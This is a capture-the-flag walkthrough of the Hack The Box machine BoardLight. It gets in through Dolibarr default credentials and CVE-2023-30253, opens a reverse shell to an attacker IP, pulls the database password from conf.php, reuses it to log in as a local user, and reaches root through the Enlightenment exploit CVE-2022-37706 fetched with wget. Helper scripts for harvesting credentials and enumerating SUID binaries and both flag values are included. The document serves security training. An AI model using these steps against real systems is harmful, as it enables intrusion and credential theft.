<div style="text-align:center;"> <img src='https://hackmd.io/_uploads/Bysymv1KR.jpg' /> <br /> <br /> </div>
<div> > HTB machine link: <a href="https://app.hackthebox.com/machines/BoardLight">https://app.hackthebox.com/machines/BoardLight</a> </div>
<div style="padding-top: 20px">

```
Nmap scan result:
> nmap 10.10.11.11 -v -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-25 02:05 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 02:05
Completed NSE at 02:05, 0.00s elapsed
Initiating NSE at 02:05
Completed NSE at 02:05, 0.00s elapsed
Initiating NSE at 02:05
Completed NSE at 02:05, 0.00s elapsed
Initiating Ping Scan at 02:05
Scanning 10.10.11.11 [2 ports]
Completed Ping Scan at 02:05, 0.31s elapsed (1 total hosts)
Initiating Connect Scan at 02:05
Scanning board.htb (10.10.11.11) [1000 ports]
Discovered open port 80/tcp on 10.10.11.11
Discovered open port 22/tcp on 10.10.11.11
Increasing send delay for 10.10.11.11 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 02:06, 30.54s elapsed (1000 total ports)
Initiating Service scan at 02:06
Scanning 2 services on board.htb (10.10.11.11)
Completed Service scan at 02:06, 6.66s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.11.
Initiating NSE at 02:06
Completed NSE at 02:06, 11.89s elapsed
Initiating NSE at 02:06
Completed NSE at 02:06, 1.27s elapsed
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
Nmap scan report for board.htb (10.10.11.11)
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.93 seconds
```

</div>
<div> The scan shows two open ports: 22 (OpenSSH 8.2p1) and 80 (Apache 2.4.41). If neither service can be exploited, I will come back and scan the full port range. Port 80 serves the website for board.htb. </div>
<div> <br /> Add the hostname to /etc/hosts: <br /> > sudo vi /etc/hosts <br /> 10.10.11.11 board.htb </div>
<div style="padding-top:50px"> I scanned for subdirectories but didn't find anything special.

```
> gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -u http://board.htb
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://board.htb
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
Starting gobuster in directory enumeration mode
/images               (Status: 301) [Size: 307] [--> http://board.htb/images/]
/css                  (Status: 301) [Size: 304] [--> http://board.htb/css/]
/js                   (Status: 301) [Size: 303] [--> http://board.htb/js/]
```

```
> dirsearch -u http://board.htb -x 403
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/reports/http_board.htb/_24-07-25_02-52-04.txt
Target: http://board.htb/
[02:52:04] Starting:
[02:52:08] 301 -  303B  - /js  ->  http://board.htb/js/
[02:52:35] 200 -    2KB - /about.php
[02:53:16] 404 -   16B  - /composer.phar
[02:53:18] 200 -    2KB - /contact.php
[02:53:20] 301 -  304B  - /css  ->  http://board.htb/css/
[02:53:39] 301 -  307B  - /images  ->  http://board.htb/images/
[02:54:04] 404 -   16B  - /php-cs-fixer.phar
[02:54:08] 404 -   16B  - /phpunit.phar
```

Neither tool found more than the static site (about.php, contact.php and the asset folders), so I brute-forced virtual hosts next. The -fs 15949 filter drops every response of that size, which is what the default site returns for an unknown Host header, so only names that are served differently show up.

```
> ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://board.htb -H 'host: FUZZ.board.htb' -fs 15949

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 15949
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 352ms]
:: Progress: [4989/4989] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:43] :: Errors: 0 ::
```

The crm vhost answers with a different page. Add it to /etc/hosts as well (10.10.11.11 board.htb crm.board.htb) before browsing to it.
</div>
At http://crm.board.htb, I found this Dolibarr login form:
![dolibarr](https://hackmd.io/_uploads/B1MqGYkKA.png)
A quick search turned up default credentials that still work: https://www.dolibarr.org/forum/t/login-after-installation/16088/2 <br /> Result: admin / admin <br />
________________________________________________
<div> The instance is Dolibarr 17.0.0, which is affected by CVE-2023-30253: an authenticated user who can edit website pages gets code execution, because the check that is meant to block PHP in page content only looks for a lowercase &lt;?php tag, while an uppercase &lt;?PHP tag is stored and executed. <br /> PoC link: <a href='https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253/tree/main'>https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253/tree/main</a> </div>
<div> Get shell: <pre>
Step 1: Listen for the reverse shell:
nc -nvlp 9999
Step 2: Run the PoC (target URL, Dolibarr credentials, attacker IP and port):
python3 exploit.py http://crm.board.htb admin admin 10.10.14.156 9999
</pre> ![dolibarr_shell](https://hackmd.io/_uploads/ry_taKyt0.png) </div>
<div> <h3> Privilege escalation </h3>
The shell runs as www-data. <br />
Back in /var/www/html, I looked for Dolibarr's configuration file: with a web tree laid out like this, a PHP config file holding database credentials is the first thing to check.
<br /> > find . -iname 'conf.php' 2>/dev/null
<br /> Result: crm.board.htb/htdocs/conf/conf.php <br />
Reading it with cat gives:

```
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';

//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';

//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';
```

</div>
<div>
The database settings are the part that matters:

```
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
```

These will be useful: besides access to the dolibarr database, the password is a candidate for reuse against local accounts.
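When you land in a Dolibarr install you want these values pulled out of conf.php quickly, and you also want to notice which security knobs are switched off. The Python below is an added example, not part of the write-up and not Dolibarr's code: it parses the $dolibarr_* assignments from a conf.php excerpt constructed for the example (same keys as the file above, placeholder values), returns the database credentials, and flags dolibarr_main_prod, dolibarr_main_force_https and dolibarr_nocsrfcheck when they hold insecure values.

```python
from __future__ import annotations

import re

# conf.php excerpt in the shape Dolibarr's installer writes. Constructed for this
# example: same keys as the file found on the box, placeholder values.
SAMPLE_CONF = r"""<?php
//
// File generated by Dolibarr installer 17.0.0
//
$dolibarr_main_url_root='http://crm.example.test';
$dolibarr_main_document_root='/var/www/html/crm/htdocs';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='example$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_authentication='dolibarr';

//$dolibarr_main_demo='autologin,autopass';
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_nocsrfcheck='0';
"""

# One assignment per line, single-quoted as the installer writes it: $name='value';
# Lines commented out with // never match, because ^ may only be followed by
# whitespace before the dollar sign.
_ASSIGN = re.compile(r"^\s*\$(dolibarr_\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.MULTILINE)


def _unescape(value: str) -> str:
    """Undo PHP single-quote escaping: only backslash-quote and backslash-backslash exist."""
    return value.replace("\\'", "'").replace("\\\\", "\\")


def parse_conf(text: str) -> dict[str, str]:
    """Return every active $dolibarr_* assignment as {name: value}."""
    return {m.group(1): _unescape(m.group(2)) for m in _ASSIGN.finditer(text)}


def db_credentials(conf: dict[str, str]) -> dict[str, str]:
    """Extract what is needed to reach the database, or to try the password elsewhere."""
    keys = ("db_type", "db_host", "db_port", "db_name", "db_prefix", "db_user", "db_pass")
    return {k: conf.get(f"dolibarr_main_{k}", "") for k in keys}


def weak_settings(conf: dict[str, str]) -> list[str]:
    """Flag security settings that are switched off, the way they are on the box."""
    findings = []
    if conf.get("dolibarr_main_prod") == "0":
        findings.append("dolibarr_main_prod=0: development mode, detailed errors are shown")
    if conf.get("dolibarr_main_force_https") == "0":
        findings.append("dolibarr_main_force_https=0: logins are accepted over plain HTTP")
    if conf.get("dolibarr_nocsrfcheck") == "1":
        findings.append("dolibarr_nocsrfcheck=1: CSRF protection disabled")
    return findings


if __name__ == "__main__":
    conf = parse_conf(SAMPLE_CONF)
    creds = db_credentials(conf)
    print(f"mysql -h {creds['db_host']} -P {creds['db_port']} -u {creds['db_user']} -p {creds['db_name']}")
    for finding in weak_settings(conf):
        print("weak:", finding)
```

The printed mysql line is only the connection command assembled from the parsed values. On this box the more valuable use of db_pass is not the database at all but password reuse against the local accounts, which is exactly what happens next.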
</div>
<div> <br /> Password reuse: I tried the database password 'serverfun2$2023!!' against the user I found in /home, larissa. <br /> It worked. </div>
<div style="text-align:center"> ![larissa_shell](https://hackmd.io/_uploads/BJIcZ9JKR.png) </div>
<div> <h2> User flag </h2> <div style="text-align:center"> ![user_flag](https://hackmd.io/_uploads/ryPgf9kYR.png) > 6050413292388fa1905ef39a049b47ad </div> </div>
<div> sudo -l shows that larissa cannot run sudo on this host, so I enumerated SUID binaries instead: <br /> > find / -perm -u=s -type f 2>/dev/null </div>
![per](https://hackmd.io/_uploads/rJbD35JF0.png)
<div> The enlightenment entries stood out: Enlightenment is a window manager, not something a stock server install ships setuid helpers for, so I looked into it. Searching for 'enlightenment exploit' gave this as the first result: <br /> <a href="https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit"> https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit </a> <br /> CVE-2022-37706 affects Enlightenment before 0.25.4: its setuid-root enlightenment_sys helper mishandles mount pathnames that begin with /dev/.., which lets a local user run commands as root. <br /> Before reaching for linpeas, run the quick manual checks first:

```
sudo -l
find / -perm -u=s -type f 2>/dev/null
uname -a
lsb_release -a
cat /etc/version && cat /etc/*release
ls -lah    # in the current user's home folder
```

Then look closely at anything that does not belong on a default install. For more detail see the repo linked above; I may write a separate post about it later. </div>
<div style="text-align:center;"> ![per_pro](https://hackmd.io/_uploads/rkmQC91FR.png) </div>
<div> To get the PoC onto the box, either run python3 -m http.server 8888 in the directory that holds it, or serve it from apache2 (document root /var/www/html). I used apache2. </div>
<br />
<div> On the BoardLight machine, in larissa's home folder, download the PoC: <br /> > wget 10.10.14.156/CVE-2022-37706-LPE-exploit/exploit.sh <br /> Then make it executable with chmod +x exploit.sh and run it.
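The manual checks above are quicker than linpeas, but the raw SUID list is long and the one interesting entry is easy to miss. The Python below is an added example (my own code, not from the write-up or from the exploit repo) that reproduces the find command and subtracts a baseline of setuid binaries a stock Ubuntu ships with, so the outlier is all that remains. The directory tree it checks is constructed for the example, and the baseline set is an assumption you should extend for your target.

```python
import os
import stat
import tempfile

# Setuid binaries a stock Ubuntu 20.04 server ships with. Baseline assembled for this
# example; anything a target has beyond it deserves a closer look.
COMMON_SUID = {
    "passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "gpasswd", "newgrp",
    "pkexec", "fusermount", "ssh-keysign", "dbus-daemon-launch-helper",
    "polkit-agent-helper-1", "at", "snap-confine",
}


def find_suid(roots):
    """Return regular files under the given roots that carry the setuid bit.

    Equivalent to `find / -perm -u=s -type f 2>/dev/null`: symlinks are not
    followed (lstat) and unreadable directories are skipped, which is os.walk's
    default behaviour.
    """
    hits = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or not stat-able; keep going like 2>/dev/null
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    hits.append(path)
    return sorted(hits)


def unusual_suid(paths, baseline=COMMON_SUID):
    """Drop the well-known distro binaries so the odd ones stand out."""
    return [p for p in paths if os.path.basename(p) not in baseline]


def demo_tree():
    """Throwaway tree (constructed): a setuid passwd, a setuid enlightenment_sys and a plain ls."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    files = (
        ("bin/passwd", 0o4755),
        ("lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys", 0o4755),
        ("bin/ls", 0o755),
    )
    for rel, mode in files:
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)  # the owner may set the setuid bit on their own file
    return base


if __name__ == "__main__":
    # Real run: on a merged-/usr system /bin and /sbin point into /usr, so one root is enough.
    for path in unusual_suid(find_suid(["/usr"])):
        print("unusual setuid binary:", path)
```

Running it against the demo tree leaves only enlightenment_sys; against a real host it leaves whatever the administrator or a third-party package added, which is the list to research one entry at a time.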
</div>
<div style="text-align:center;"> ![rootgot](https://hackmd.io/_uploads/H1HtJiyK0.png) </div>
<div style="text-align:center;"> With a root shell, read the root flag. ![rootflag](https://hackmd.io/_uploads/rkj1eskFC.png) > bdb34745757d163fd9e3d4ff39a5073a </div>